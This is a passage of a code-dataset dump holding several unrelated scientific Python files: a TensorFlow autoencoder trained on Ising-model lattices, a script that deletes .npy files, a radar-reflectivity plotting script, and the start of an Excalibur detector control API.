tf.train.AdamOptimizer(learning_rate= 1e-4 ).minimize(train_d_loss, var_list=d_param)\n enc_optim = tf.train.AdamOptimizer(learning_rate= 1e-4 ).minimize(JS_loss, var_list=encoder_param)\n saver = tf.train.Saver()\n\nwith tf.Session() as sess:\n if Is_train == False:\n saver.restore(sess,'./GANmodel.ckpt')\n if Is_train == True:\n writer = tf.summary.FileWriter('./graphs', sess.graph)\n training_data = data_loader.load_data_wrapper()\n tvals = np.repeat(np.linspace(-1.0,0.9,32),10000)\n c = list(zip(training_data,tvals))\n random.shuffle(c)\n training_data, tvals = zip(*c)\n print(len(training_data),len(tvals))\n m = tf.placeholder(tf.float32,[datapoints, 64])\n n = tf.placeholder(tf.float32,[datapoints, 1])\n dataset = tf.data.Dataset.from_tensor_slices((m,n))\n dataset = dataset.prefetch(buffer_size=1000)\n dataset = dataset.batch(batch_size)\n iterator = dataset.make_initializable_iterator()\n next = iterator.get_next()\n print(\"============< WARNING >===============\")\n sess.run(tf.global_variables_initializer())\n print(\"==========< Model DELETED >===========\")\n sess.run(iterator.initializer,feed_dict = {m:training_data, n:np.array(tvals).reshape(datapoints,1) + 0.01*np.random.randn(datapoints,1)})\n print(\"Session initialized :)\")\n print(\"Iterator initialized :)\")\n\n for i in range(20000):\n if i>0 and i % (datapoints // batch_size) == 0:\n sess.run(iterator.initializer, feed_dict = {m:training_data, n:np.array(tvals).reshape(datapoints,1) + 0.01*np.random.randn(datapoints,1) })\n g,h = sess.run(next)\n\n VAE_loss_curr,_ = sess.run([recon_loss,vae_optim], feed_dict={x:g,y:h})\n # for _ in range(3):\n z_p = np.random.uniform(-1,1,size=[1,batch_size ])\n D_loss_curr,_ = sess.run([train_d_loss,d_optim], feed_dict={x:g,z_prior:z_p})\n # z_p = np.random.normal(size=[batch_size, n_z])\n JS_loss_curr,_ = sess.run([train_d_loss,d_optim], feed_dict={x:g,z_prior:z_p})\n if i % 1000 == 0:\n print('Iter: {}'.format(i),' D loss: {:.4}'. format(D_loss_curr),' Rec_loss: {:.4}'.format(VAE_loss_curr))\n\n save_path = saver.save(sess, \"./GANmodel.ckpt\")\n print(\"Model saved in path: %s\" % save_path)\n\n n_samples = (32,20)\n if n_z == 1:\n T_vals = np.linspace(-1,0.9,32)\n zsample = np.mgrid[-1.0:0.9:0.059375, -2.0:6.0:0.4].reshape(2,-1).T#np.random.normal(size = [n_samples[0]*n_samples[1],n_z])\n print(zsample)\n if loss_type == 'Binary_crossentropy':\n Gsample = sess.run(fully_connected_decoder1, feed_dict={z: zsample[:,1].reshape(zsample.shape[0],1), y:zsample[:,0].reshape(zsample.shape[0],1) + 0.01*np.random.randn(zsample.shape[0],1)})\n Gsample2 = sess.run(fully_connected_decoder2, feed_dict={fully_connected_decoder1: Gsample })\n gsample = sess.run(x_hat, feed_dict={fully_connected_decoder2: Gsample2 })\n elif loss_type == 'log_gaussian':\n gsample = sess.run(x_hat,feed_dict={z:zsample[:,1].reshape(zsample.shape[0],1),y:zsample[:,0].reshape(zsample.shape[0],1) } )\n else:\n T_vals = np.linspace(-1,0.9,32)\n n_samples = (32,20)\n zsample = np.random.normal(size = [n_samples[0]*n_samples[1],n_z])#np.mgrid[-1.0:0.9:0.059375, -2.0:2.0:0.2].reshape(2,-1).T\n print(zsample)\n if loss_type == 'Binary_crossentropy':\n Gsample = sess.run(fully_connected_decoder1, feed_dict={z: zsample[:,1].reshape(zsample.shape[0],1), y:zsample[:,0].reshape(zsample.shape[0],1) + 0.01*np.random.randn(zsample.shape[0],1)})\n Gsample2 = sess.run(fully_connected_decoder2, feed_dict={fully_connected_decoder1: Gsample })\n gsample = sess.run(x_hat, feed_dict={fully_connected_decoder2: Gsample2 })\n elif loss_type == 'log_gaussian':\n gsample = sess.run(x_hat,feed_dict={z:zsample,y:np.repeat(T_vals,n_samples[1]).reshape(n_samples[0]*n_samples[1],1) } )\n\n gsample = gsample.reshape(zsample.shape[0],lattice_size,lattice_size)\n\n mean_magnetization = []\n Magnetization = get_parameters.get_mean_magnetization(gsample)\n Magnetization_direction = get_parameters.get_magnetization_direction(gsample)\n energy = get_parameters.get_energy(gsample)\n if n_z == 1:\n for d in range(0,n_samples[0],5):\n plt.plot(zsample[:n_samples[1],1],Magnetization[0][0][d*n_samples[1]:(d+1)*n_samples[1]],label = d) #all values\n plt.xlabel('Latent Variable value', fontsize=12)\n plt.ylabel('Magnetization of a single sample generated by the network', fontsize=10)\n plt.legend()\n plt.show()\n for d in range(n_samples[0]):\n plt.plot(zsample[:n_samples[1],1],Magnetization_direction[d*n_samples[1]:(d+1)*n_samples[1]])\n plt.show()\n plt.hist(energy,bins =100)\n plt.legend()\n plt.show()\n n_maps = 2000 #no of mappings per temp\n for d in range(0,n_samples[1]):\n plt.plot(zsample[d:zsample.shape[0]:n_samples[1],0],Magnetization[0][0][d:zsample.shape[0]:n_samples[1]],label = d)\n plt.legend(loc='best')\n plt.show()\n if Is_train == False:\n f = open('./DATA/8by8lattices.pkl', 'rb')\n if (f.read(2) == '\\x1f\\x8b'):\n f.seek(0)\n gzip.GzipFile(fileobj=f)\n else:\n f.seek(0)\n training_data = pickle.load(f, encoding=\"latin1\")\n training_data = np.reshape(training_data,(320000, 64))\n for d in range(0,32,4):\n sampledz = sess.run(u,feed_dict={x:training_data[10000*d+500:10000*d+500+n_maps],y:np.repeat(T_vals[d],n_maps).reshape(n_maps,1)})\n plt.scatter(sampledz[:,0],sampledz[:,1],label = d)\n plt.legend()\n plt.show()\n else:\n for d in range(0,n_samples[0],5):\n plt.plot(Magnetization[0][0][d*n_samples[1]:(d+1)*n_samples[1]],label = d) #all values\n plt.xlabel('Latent Variable value', fontsize=12)\n plt.ylabel('Magnetization of a single sample generated by the network', fontsize=10)\n plt.legend()\n plt.show()\n for d in range(n_samples[0]):\n plt.plot(Magnetization_direction[d*n_samples[1]:(d+1)*n_samples[1]])\n plt.show()\n plt.hist(energy,bins =100)\n plt.legend()\n plt.show()\n n_maps = 2000 #no of mappings per temp\n for d in range(0,n_samples[1]):\n plt.plot(Magnetization[0][0][d:zsample.shape[0]:n_samples[1]],label = d)\n plt.legend(loc='best')\n plt.show()\n if Is_train == False:\n f = open('./DATA/8by8lattices.pkl', 'rb')\n if (f.read(2) == '\\x1f\\x8b'):\n f.seek(0)\n gzip.GzipFile(fileobj=f)\n else:\n f.seek(0)\n training_data = pickle.load(f, encoding=\"latin1\")\n training_data = np.reshape(training_data,(320000, 64))\n for d in range(0,32,4):\n sampledz = sess.run(u,feed_dict={x:training_data[10000*d+500:10000*d+500+n_maps],y:np.repeat(T_vals[d],n_maps).reshape(n_maps,1)})\n plt.scatter(sampledz[:,0],sampledz[:,1],label = d)\n plt.legend()\n plt.show()\n # Mdist = []\n # Edist = []\n # mean_magnetization = []\n # var_magnetization = []\n # mean_magnetization_data = []\n # var_magnetization_data = []\n # mean_energy = []\n # var_energy = []\n # mean_energy_data = []\n # var_energy_data = []\n #\n # n = n_samples[1]\n # if Is_train == False:\n # f = open('./DATA/8by8lattices.pkl', 'rb')\n # if (f.read(2) == '\\x1f\\x8b'):\n # f.seek(0)\n # gzip.GzipFile(fileobj=f)\n # else:\n # f.seek(0)\n # training_data = pickle.load(f, encoding=\"latin1\")\n # training_data = np.reshape(training_data,(320000, 64))\n # for i in range(0,n_samples[0]):\n # Magnetization = get_parameters.get_mean_magnetization(gsample[i*n_samples[1]:(i+1)*n_samples[1]])\n # Magnetization_direction = get_parameters.get_magnetization_direction(gsample[i*n_samples[1]:(i+1)*n_samples[1]])\n # energy = get_parameters.get_energy(gsample[i*n_samples[1]:(i+1)*n_samples[1]])\n # print(i)\n # if Is_train == False:\n # fig1 = plt.figure(1)\n # plt.plot(zsample[:n_samples[1],1],Magnetization[0][0],label = (T_vals[i]+1.1))\n # fig2 = plt.figure(2)\n # plt.plot(zsample[:n_samples[1],1],Magnetization_direction,label = (T_vals[i]+1.1))\n # if Is_train == True:\n # lattices = np.array(training_data[i*10000:i*10000+n]).reshape(n,lattice_size,lattice_size)\n # energy_data = get_parameters.get_energy(lattices)\n # thetas_data = get_parameters.get_magnetization_direction(lattices)\n # [mag_data,mag_mean,mag_std] = get_parameters.get_mean_magnetization(lattices)\n # plt.subplot(3,1,1)\n # plt.hist(Magnetization[0][0][i*n_samples[1]:(i+1)*n_samples[1]],bins =20,color='b',range=[0, 1],alpha=0.5)\n # plt.hist(mag_data ,bins =20,color='g',range=[0, 1],alpha=0.5)\n # plt.ylabel('Magnetization ')\n #\n # mean_magnetization.append(Magnetization[1])\n # var_magnetization.append(Magnetization[2])\n # mean_magnetization_data.append(mag_mean)\n # var_magnetization_data.append(mag_std)\n #\n # mean_energy.append(np.mean(energy))\n # var_energy.append(np.std(energy))\n # mean_energy_data.append(np.mean(energy_data))\n # var_energy_data.append(np.std(energy_data))\n #\n # plt.subplot(3,1,2)\n # plt.plot(Magnetization_direction,linestyle='dotted',color='b')\n # plt.plot(thetas_data, linestyle='dotted',color='g')\n # plt.ylabel('Magnetization direction')\n # plt.ylim((-360,0))\n # # plt.title('Magnetization direction')\n #\n # plt.subplot(3,1,3)\n # plt.hist(energy ,bins =300,color='b',range=[-130, 20],alpha =0.5)\n # plt.hist(energy_data,bins =300,color='g',range=[-130, 20],alpha=0.5)\n # plt.ylabel('Energy')\n #\n # # plt.show()\n # plt.savefig('./out/combined@ %f.png'%((T_vals[i]+1.1)), bbox_inches='tight')\n # plt.close()\n # Mhist_1,_ = np.histogram(Magnetization[0][0],bins =20,range=[0, 1])\n # Mhist_2,_ = np.histogram(mag_data ,bins =20,range=[0, 1])\n # Mdist.append(return_intersection(Mhist_1,Mhist_2))\n #\n # Ehist_1,_ = np.histogram(energy ,bins =300,range=[-130, 20])\n # Ehist_2,_ = np.histogram(energy_data,bins =300,range=[-130, 20])\n # Edist.append(return_intersection(Ehist_1,Ehist_2))\n # if Is_train ==False:\n # plt.xlabel('Latent Variable value', fontsize=12)\n # plt.ylabel('Magnetization of a single sample generated by the network', fontsize=10)\n # plt.legend()\n # plt.show()\n # if Is_train == True:\n # print(\"Magnetization Accuracy\")\n # print(Mdist)\n # print(mean_magnetization)\n # print(mean_magnetization_data)\n # print(var_magnetization)\n # print(var_magnetization_data)\n # plt.errorbar(T_vals+1.1,mean_magnetization,var_magnetization,color='b',label='Samples')\n # plt.errorbar(T_vals+1.1,mean_magnetization_data,var_magnetization_data,color = 'g',label='Data')\n # plt.xlabel(\"Temperature\")\n # plt.ylabel('Magnetization')\n # plt.title('AAE VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Magnetization.png', bbox_inches='tight')\n # plt.show()\n #\n # print(\"Energy Accuracy\")\n # print(Edist)\n # print(mean_energy)\n # print(mean_energy_data)\n # print(var_energy)\n # print(var_energy_data)\n # plt.errorbar(T_vals+1.1,mean_energy,var_energy,color='b',label='Samples')\n # plt.errorbar(T_vals+1.1,mean_energy_data,var_energy_data,color = 'g',label='Data')\n # plt.xlabel(\"Temperature\")\n # plt.ylabel('Energy')\n # plt.title('AAE_VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Energy.png', bbox_inches='tight')\n # plt.show()\n #\n # print(\"Specfic Heat\")\n # plt.plot(T_vals+1.1,(np.array(var_energy)**2)/((T_vals+1.1)**2),color='b',label='Samples')\n # plt.plot(T_vals+1.1,(np.array(var_energy_data)**2)/((T_vals+1.1)**2),color='g',label='Data')\n # plt.ylabel(\"Specific Heat\")\n # plt.xlabel('Temperature')\n # plt.title('AAE_VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Specific Heat.png', bbox_inches='tight')\n # plt.show()\n #\n # print(\"Magnetic Susceptibility\")\n # plt.plot(T_vals+1.1,(np.array(var_magnetization)**2)/(T_vals+1.1),color='b',label='Samples')\n # plt.plot(T_vals+1.1,(np.array(var_magnetization_data)**2)/(T_vals+1.1),color='g',label='Data')\n # plt.ylabel(\"Magnetic Susceptibility\")\n # plt.xlabel('Temperature')\n # plt.title('AAE_VAE')\n # plt.legend()\n # plt.savefig('../../Desktop/AAE_VAE-Magnetic_Susceptibility.png', bbox_inches='tight')\n # plt.show()\n","sub_path":"2 july/AAE_vae.py","file_name":"AAE_vae.py","file_ext":"py","file_size_in_byte":18528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"513042158","text":"import os\n\nwalk_dir = '/home/werdn/input/bird/train_audio'\n\n\ndef main():\n for root, subdirs, files in os.walk(walk_dir):\n print('--\\nroot = ' + root)\n list_file_path = os.path.join(root, 'my-directory-list.txt')\n print('list_file_path = ' + list_file_path)\n\n with open(list_file_path, 'wb') as list_file:\n for subdir in subdirs:\n print('\\t- subdirectory ' + subdir)\n\n for filename in files:\n file_path = os.path.join(root, filename)\n\n print('\\t- file %s (full path: %s)' % (filename, file_path))\n parts = filename.split(\".\")\n if parts[1] == 'npy':\n os.remove(file_path)\n # with open(file_path, 'rb') as f:\n # f_content = f.read()\n # list_file.write(('The file %s contains:\\n' % filename).encode('utf-8'))\n # list_file.write(f_content)\n # list_file.write(b'\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"utils/bird/remove_flies.py","file_name":"remove_flies.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"227996283","text":"import matplotlib.pyplot as plt\nfrom netCDF4 import Dataset\nimport glob\nfs=glob.glob('IPHEX_E*20140512*')\nfsKu=glob.glob('IPHEX_H*20140512*Ku*')\nfrom numpy import *\n#l1=[14000,15000]\n#l2=500:1500\n#l3=3000:4000\nfsKu=sorted(fsKu)\nfhKu=Dataset(fsKu[1])\ndbzKu=fhKu['zku'][:,:]\ndbzKum=ma.array(dbzKu,mask=dbzKu<0)\nrngKu=fhKu['range'][:]/1e3\n\ntKu=fhKu['timed'][:]\n\nf=sorted(fs)[1]\nfh=Dataset(f)\ntX=fh['timed'][:]\ndbz=fh['zku'][:,:]\nns=[[0,4000],[4000,8000],[8000,10000],[10000,12000],[12000,14000]]\ndbzm=ma.array(dbz,mask=dbz<0)\nrng=fh['range'][:]\nind=array([1063, 1064, 1065, 1066, 1067, 1068, 1069, 1070, 1071, 1072])\nr1=20-rng/1e3\nind=nonzero(abs(r1)<0.1)\ndn=[800,150,100]\naroll=fh['roll'][:]\nprofsL=[]\nfor ns1,dn1 in zip(ns[:3],dn):\n plt.figure()\n plt.subplot(211)\n plt.pcolormesh(arange(ns1[0],ns1[1]),20-rng/1e3,\\\n dbzm[ns1[0]:ns1[1],:].T,vmin=10,cmap='jet',vmax=55)\n plt.ylim(0,15)\n plt.colorbar()\n dbzKuL=[]\n for k in range(ns1[0],ns1[1]):\n i0=argmin(abs(tKu-tX[k]))\n \n if tKu[i0]>tX[k]:\n i0-=1\n dt=tKu[i0+1]-tKu[i0]\n f=(tX[k]-tKu[i0])/dt\n if dt<0.1:\n dbzKuL.append((1-f)*dbzKu[i0,:]+f*dbzKu[i0+1,:])\n else:\n dbzKuL.append(0*dbzKu[i0+1,:]-99)\n plt.subplot(212)\n dbzKuL=array(dbzKuL)\n dbzKuLm=ma.array(dbzKuL,mask=dbzKuL<0)\n plt.pcolormesh(arange(ns1[0],ns1[1]),20-rngKu,\\\n dbzKuLm[:,:].T,vmin=10,cmap='jet',vmax=55)\n plt.ylim(0,15)\n plt.colorbar()\n for k in range(ns1[0],ns1[1]):\n h1=20-rng[300:1040]/1e3\n h2=20-rngKu.data\n if abs(aroll[k])<1 and dbzm[k,500:1000].max()>42:\n zkuint=interp(h1[::-1].data,h2[130:550][::-1],\\\n dbzKuLm[k-ns1[0],130:550][::-1])[::-1]\n profsL.append([dbz[k,:][300:1040],zkuint])\n for k in range(0):\n plt.figure()\n plt.plot(dbzm[ns1[0]+dn1+k*10,:],20-rng/1e3)\n plt.plot(dbzKuLm[dn1+k*10,:],20-rngKu)\n\n","sub_path":"XRAD/plotXRAD0512_0.py","file_name":"plotXRAD0512_0.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"288694151","text":"\"\"\"\ninterface_wrapper.py - EXCALIBUR high level API for the ODIN server.\n\nAlan Greer, DLS\n\"\"\"\nimport sys\nimport traceback\nimport logging\nimport json\nfrom datetime import datetime\nimport time\nimport threading\nis_py2 = sys.version[0] == '2'\nif is_py2:\n import Queue as queue\nelse:\n import queue as queue\n\nfrom excalibur.detector import ExcaliburDetector, ExcaliburDetectorError\nfrom excalibur.calibration_files import DetectorCalibration\nfrom excalibur.definitions import ExcaliburDefinitions\nfrom excalibur.efuse_id_parser import ExcaliburEfuseIDParser\nfrom enum import Enum\nfrom collections import OrderedDict\n\n\n\nclass ExcaliburParameter(OrderedDict):\n def __init__(self, param, value,\n fem=ExcaliburDefinitions.ALL_FEMS, chip=ExcaliburDefinitions.ALL_CHIPS):\n super(ExcaliburParameter, self).__init__()\n self['param'] = param\n self['value'] = value\n self['fem'] = fem\n self['chip'] = chip\n\n def get(self):\n return self.param, self.value, self.fem, self.chip\n\n\nclass ExcaliburReadParameter(OrderedDict):\n def __init__(self, param, fem=ExcaliburDefinitions.ALL_FEMS, chip=ExcaliburDefinitions.ALL_CHIPS):\n super(ExcaliburReadParameter, self).__init__()\n self['param'] = param\n self['fem'] = fem\n self['chip'] = chip\n\n def get(self):\n return self.param, self.fem, self.chip\n\n\nclass ParameterType(Enum):\n \"\"\"Enumeration of all available types\n \"\"\"\n UNKNOWN = 0\n DICT = 1\n LIST = 2\n INT = 3\n DOUBLE = 4\n STRING = 5\n ENUM = 6\n\n\nclass Parameter(object):\n def __init__(self, name, data_type=ParameterType.UNKNOWN, value=None, callback=None, every_time=False):\n self._name = name\n self._datatype = data_type\n self._value = value\n self._callback = callback\n self._every_time = every_time\n\n @property\n def value(self):\n return self.get()['value']\n\n def get(self):\n # Create the dictionary of information\n return_value = {'value': self._value,\n 'type': self._datatype.value\n }\n return return_value\n\n def set_value(self, value, callback=True):\n changed = False\n if self._value != value:\n self._value = value\n changed = True\n if self._callback is not None:\n if callback:\n if self._every_time:\n self._callback(self._name, self._value)\n elif changed:\n self._callback(self._name, self._value)\n\n\nclass EnumParameter(Parameter):\n def __init__(self, name, value=None, allowed_values=None, callback=None, every_time=False):\n super(EnumParameter, self).__init__(name, data_type=ParameterType.ENUM, value=value,\n callback=callback, every_time=every_time)\n self._allowed_values = allowed_values\n\n def get(self):\n # Create the dictionary of information\n return_value = super(EnumParameter, self).get()\n if self._allowed_values is not None:\n return_value['allowed_values'] = self._allowed_values\n return return_value\n\n @property\n def index(self):\n return self.get()['allowed_values'].index(self.value)\n\n\nclass IntegerParameter(Parameter):\n def __init__(self, name, value=None, limits=None, callback=None, every_time=False):\n super(IntegerParameter, self).__init__(name, data_type=ParameterType.INT, value=value,\n callback=callback, every_time=every_time)\n self._limits = limits\n\n def get(self):\n # Create the dictionary of information\n return_value = super(IntegerParameter, self).get()\n if self._limits is not None:\n return_value['limits'] = self._limits\n return return_value\n\n\nclass DoubleParameter(Parameter):\n def __init__(self, name, value=None, limits=None, callback=None, every_time=False):\n super(DoubleParameter, self).__init__(name, data_type=ParameterType.DOUBLE, value=value,\n callback=callback, every_time=every_time)\n self._limits = limits\n\n def get(self):\n # Create the dictionary of information\n return_value = super(DoubleParameter, self).get()\n if self._limits is not None:\n return_value['limits'] = self._limits\n return return_value\n\n\nclass StringParameter(Parameter):\n def __init__(self, name, value=None, callback=None, every_time=False):\n super(StringParameter, self).__init__(name, data_type=ParameterType.STRING, value=value,\n callback=callback, every_time=every_time)\n\n\nclass HLExcaliburDetector(ExcaliburDetector):\n \"\"\"Wraps the detector class to provide a high level interface.\n\n \"\"\"\n test_mode = False\n\n STATE_IDLE = 0\n STATE_ACQUIRE = 1\n STATE_CALIBRATING = 2\n\n def __init__(self, fem_connections):\n super(HLExcaliburDetector, self).__init__(fem_connections)\n\n self._fems = range(1, len(fem_connections)+1)\n logging.debug(\"Fem conection IDs: %s\", self._fems)\n\n self._default_status = []\n for fem in self._fems:\n self._default_status.append(None)\n\n # Create the calibration object\n self._cb = DetectorCalibration()\n\n # Create the Excalibur parameters\n self._param = {\n 'api': DoubleParameter('api', 0.1),\n 'config/num_images': IntegerParameter('num_images', 1),\n 'config/exposure_time': DoubleParameter('exposure_time', 1.0),\n 'config/num_test_pulses': IntegerParameter('num_test_pulses', 0),\n 'config/scan_dac_num': IntegerParameter('scan_dac_num', 0),\n 'config/scan_dac_start': IntegerParameter('scan_dac_start', 0),\n 'config/scan_dac_stop': IntegerParameter('scan_dac_stop', 0),\n 'config/scan_dac_step': IntegerParameter('scan_dac_step', 0),\n 'config/test_pulse_enable': EnumParameter('test_pulse_enable',\n ExcaliburDefinitions.FEM_TEST_PULSE_NAMES[0],\n ExcaliburDefinitions.FEM_TEST_PULSE_NAMES),\n 'config/image_mode': EnumParameter('image_mode',\n ExcaliburDefinitions.FEM_IMAGEMODE_NAMES[0],\n ExcaliburDefinitions.FEM_IMAGEMODE_NAMES),\n 'config/operation_mode': EnumParameter('operation_mode',\n ExcaliburDefinitions.FEM_OPERATION_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_OPERATION_MODE_NAMES),\n 'config/lfsr_bypass': EnumParameter('lfsr_bypass',\n ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_NAMES),\n 'config/read_write_mode': EnumParameter('read_write_mode',\n ExcaliburDefinitions.FEM_READOUT_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_READOUT_MODE_NAMES),\n 'config/disc_csm_spm': EnumParameter('disc_csm_spm',\n ExcaliburDefinitions.FEM_DISCCSMSPM_NAMES[0],\n ExcaliburDefinitions.FEM_DISCCSMSPM_NAMES),\n 'config/equalization_mode': EnumParameter('equalization_mode',\n ExcaliburDefinitions.FEM_EQUALIZATION_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_EQUALIZATION_MODE_NAMES),\n 'config/trigger_mode': EnumParameter('trigger_mode',\n ExcaliburDefinitions.FEM_TRIGMODE_NAMES[0],\n ExcaliburDefinitions.FEM_TRIGMODE_NAMES),\n 'config/trigger_polarity': EnumParameter('trigger_polarity',\n ExcaliburDefinitions.FEM_TRIGPOLARITY_NAMES[1],\n ExcaliburDefinitions.FEM_TRIGPOLARITY_NAMES),\n 'config/csm_spm_mode': EnumParameter('csm_spm_mode',\n ExcaliburDefinitions.FEM_CSMSPM_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_CSMSPM_MODE_NAMES,\n callback=self.update_calibration),\n 'config/colour_mode': EnumParameter('colour_mode',\n ExcaliburDefinitions.FEM_COLOUR_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_COLOUR_MODE_NAMES),\n 'config/gain_mode': EnumParameter('gain_mode',\n ExcaliburDefinitions.FEM_GAIN_MODE_NAMES[0],\n ExcaliburDefinitions.FEM_GAIN_MODE_NAMES,\n callback=self.hl_set_gain_mode),\n 'config/counter_select': IntegerParameter('counter_select', 0),\n 'config/counter_depth': EnumParameter('counter_depth',\n '12',\n ['1', '6', '12', '24']),\n 'config/cal_file_root': StringParameter('cal_file_root', '', callback=self.update_calibration),\n 'config/energy_threshold': DoubleParameter('energy_threshold', 0.0, callback=self.update_calibration),\n 'config/udp_file': StringParameter('udp_file', ''),\n 'config/hv_bias': DoubleParameter('hv_bias', 0.0, callback=self.hl_hv_bias_set),\n 'config/lv_enable': IntegerParameter('lv_enable', 0, callback=self.hl_lv_enable, every_time=True),\n 'config/hv_enable': IntegerParameter('hv_enable', 0, callback=self.hl_hv_enable, every_time=True),\n 'config/test_dac_file': StringParameter('test_dac_file', ''),\n 'config/test_mask_file': StringParameter('test_mask_file', ''),\n\n #[\"Normal\",\n # \"Burst\",\n # \"Histogram\",\n # \"DAC Scan\",\n # \"Matrix Read\"])\n }\n self._status = {\n 'calibrating': 0,\n 'calibration': [0] * len(self._fems),\n 'lv_enabled': 0,\n 'hv_enabled': 0,\n 'sensor': {\n 'width': ExcaliburDefinitions.X_PIXELS_PER_CHIP * ExcaliburDefinitions.X_CHIPS_PER_FEM,\n 'height': ExcaliburDefinitions.Y_PIXELS_PER_CHIP *\n ExcaliburDefinitions.Y_CHIPS_PER_FEM * len(self._fems),\n 'bytes': 0\n },\n 'manufacturer': 'DLS/STFC',\n 'model': 'Odin [Excalibur2]',\n 'error': '',\n 'state': HLExcaliburDetector.STATE_IDLE,\n 'fe_lv_enable': [None],\n 'fe_hv_enable': [None],\n 'pwr_p5va_vmon': [None],\n 'pwr_p5vb_vmon': [None],\n 'pwr_p5v_fem00_imon': [None],\n 'pwr_p5v_fem01_imon': [None],\n 'pwr_p5v_fem02_imon': [None],\n 'pwr_p5v_fem03_imon': [None],\n 'pwr_p5v_fem04_imon': [None],\n 'pwr_p5v_fem05_imon': [None],\n 'pwr_p48v_vmon': [None],\n 'pwr_p48v_imon': [None],\n 'pwr_p5vsup_vmon': [None],\n 'pwr_p5vsup_imon': [None],\n 'pwr_humidity_mon': [None],\n 'pwr_air_temp_mon': [None],\n 'pwr_coolant_temp_mon': [None],\n 'pwr_coolant_flow_mon': [None],\n 'pwr_p3v3_imon': [None],\n 'pwr_p1v8_imonA': [None],\n 'pwr_bias_imon': [None],\n 'pwr_p3v3_vmon': [None],\n 'pwr_p1v8_vmon': [None],\n 'pwr_bias_vmon': [None],\n 'pwr_p1v8_imonB': [None],\n 'pwr_p1v8_vmonB': [None],\n 'pwr_coolant_temp_status': [None],\n 'pwr_humidity_status': [None],\n 'pwr_coolant_flow_status': [None],\n 'pwr_air_temp_status': [None],\n 'pwr_fan_fault': [None],\n 'efuseid_c0': [0] * len(self._fems),\n 'efuseid_c1': [0] * len(self._fems),\n 'efuseid_c2': [0] * len(self._fems),\n 'efuseid_c3': [0] * len(self._fems),\n 'efuseid_c4': [0] * len(self._fems),\n 'efuseid_c5': [0] * len(self._fems),\n 'efuseid_c6': [0] * len(self._fems),\n 'efuseid_c7': [0] * len(self._fems),\n 'efuse_match': [0] * len(self._fems)\n }\n logging.debug(\"Status: %s\", self._status)\n self._calibration_status = {\n 'dac': [0] * len(self._fems),\n 'discl': [0] * len(self._fems),\n 'disch': [0] * len(self._fems),\n 'mask': [0] * len(self._fems),\n 'thresh': [0] * len(self._fems)\n }\n\n self._executing_updates = True\n self._read_efuse_ids = False\n self._acquiring = False\n self._frames_acquired = 0\n self._hw_frames_acquired = 0\n self._acq_frame_count = 0\n self._acq_exposure = 0.0\n self._acq_start_time = datetime.now()\n self._acq_timeout = 0.0\n self._comms_lock = threading.RLock()\n self._param_lock = threading.RLock()\n self._fast_update_time = datetime.now()\n self._medium_update_time = datetime.now()\n self._slow_update_time = datetime.now()\n self._startup_time = datetime.now()\n self._frame_start_count = 0\n self._frame_count_time = None\n self._calibration_required = True\n self._moly_humidity_counter = 0\n\n # Temporary 24 bit mode setup\n # TODO: Remove this once 24 bit mode has been implemented within the firmware\n self._24bit_mode = False\n self._24bit_acquiring = False\n self._24bit_params = None\n self._counter_select = 0\n self._acquisition_loops = 0\n # End of 24 bit mode\n\n if self.test_mode is False:\n # Perform a slow read\n self.slow_read()\n self._lv_toggle_required = False\n with self._param_lock:\n if self._status['lv_enabled'] == 0:\n # We have started up with the lv not enabled so toggle in case of detector power cycle\n self._lv_toggle_required = True\n self._status_thread = threading.Thread(target=self.status_loop)\n self._status_thread.start()\n # Create the command handling thread\n self._command_lock = threading.Lock()\n self._command_queue = queue.Queue()\n self._command_thread = threading.Thread(target=self.command_loop)\n self._command_thread.start()\n self.init_hardware_values()\n\n def init_hardware_values(self):\n gain_mode = self._param['config/gain_mode']\n self.hl_set_gain_mode('config/gain_mode', gain_mode.value)\n\n def hl_set_gain_mode(self, name, value):\n with self._comms_lock:\n # Initialise the detector parameters\n write_params = []\n gain_mode = self._param['config/gain_mode']\n logging.info(' Setting ASIC gain mode to {} '.format(gain_mode.value))\n write_params.append(ExcaliburParameter('mpx3_gainmode', [[gain_mode.index]]))\n self.hl_write_params(write_params)\n self.update_calibration(name, value)\n\n def hl_load_udp_config(self, name, filename):\n logging.debug(\"Loading UDP configuration [{}] from file {}\".format(name, filename))\n\n try:\n with open(filename) as config_file:\n udp_config = json.load(config_file)\n except IOError as io_error:\n logging.error(\"Failed to open UDP configuration file: {}\".format(io_error))\n self.set_error(\"Failed to open UDP configuration file: {}\".format(io_error))\n return\n except ValueError as value_error:\n logging.error(\"Failed to parse UDP json config: {}\".format(value_error))\n self.set_error(\"Failed to parse UDP json config: {}\".format(value_error))\n return\n\n source_data_addr = []\n source_data_mac = []\n source_data_port = []\n dest_data_port_offset = []\n\n for idx, fem in enumerate(udp_config['fems']):\n source_data_addr.append(fem['ipaddr'])\n source_data_mac.append(fem['mac'])\n source_data_port.append(fem['port'])\n dest_data_port_offset.append(fem['dest_port_offset']\n )\n logging.debug(\n 'FEM {idx:d} | '\n 'ip: {ipaddr:16s} mac: {mac:s} port: {port:5d} offset: {dest_port_offset:d}'.format(\n idx=idx, **fem)\n )\n\n udp_params = []\n num_fems = len(self._fems)\n # Append per-FEM UDP source parameters, truncating to number of FEMs present in system\n udp_params.append(ExcaliburParameter(\n 'source_data_addr', [[addr] for addr in source_data_addr[:num_fems]],\n ))\n udp_params.append(ExcaliburParameter(\n 'source_data_mac', [[mac] for mac in source_data_mac[:num_fems]],\n ))\n udp_params.append(ExcaliburParameter(\n 'source_data_port', [[port] for port in source_data_port[:num_fems]]\n ))\n udp_params.append(ExcaliburParameter(\n 'dest_data_port_offset',\n [[offset] for offset in 